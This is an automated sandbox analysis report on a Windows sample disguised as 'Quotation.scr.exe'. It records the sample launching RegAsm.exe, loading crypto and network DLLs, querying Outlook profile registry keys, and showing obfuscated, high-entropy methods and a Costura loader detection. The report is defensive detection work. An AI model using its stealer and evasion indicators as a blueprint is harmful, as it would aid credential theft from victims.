                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Quotation.scr.exeVirustotal: Detection: 28%
                    Source: Quotation.scr.exeReversingLabs: Detection: 31%
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation.scr.exe "C:\Users\user\Desktop\Quotation.scr.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Quotation.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.5790000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578A411 push eax; retf 0_2_0578A414
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586BBC0 push eax; retf 0_2_0586BBCD
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D1D9B push E8FFFFFFh; retf 0_2_058D1DA1
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D7021 push cs; iretd 0_2_058D7027
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059336C7 push es; retf 0_2_059336CC
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B831B0 pushad ; iretd 0_2_05B831B3
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B8088C push E8000001h; retf 0_2_05B80891
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B85735 push cs; retf 0000h0_2_05B85740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DB570 push dword ptr [ebp+ebx-75h]; iretd 2_2_012DB53D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D891E pushad ; iretd 2_2_012D891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D8DDF push esp; iretd 2_2_012D8DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D8C2F pushfd ; iretd 2_2_012D8C30
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, j1bgXlDUmHmGlK1NBYE.csHigh entropy of concatenated method names: 'h9HDd96Wny', 'fsjDyNHK2tCrwAeP9x4', 'pjFY98Htqf1gQslItLF', 'peHcXZHG3bYOHBxDsKT', 'J2Wc56HLHNZlZSebJJl', 'dOSrw4HIgK03o09w7fb', 'cOgA20HTgH0paud1qRc', 'DRhjK9HxO20DARA6lmU'
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, NoxXayDsnjOk43FfmnZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ykYDYLGTgV', 'NtProtectVirtualMemory', 'E6HC7OHHvXlvbXa3iGt', 'pgNU8HHiX9P0FOekBxb', 'D5T1GdHa0rFuLt37KBN', 'SvLMhoH8WNNyys5q8NR'
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
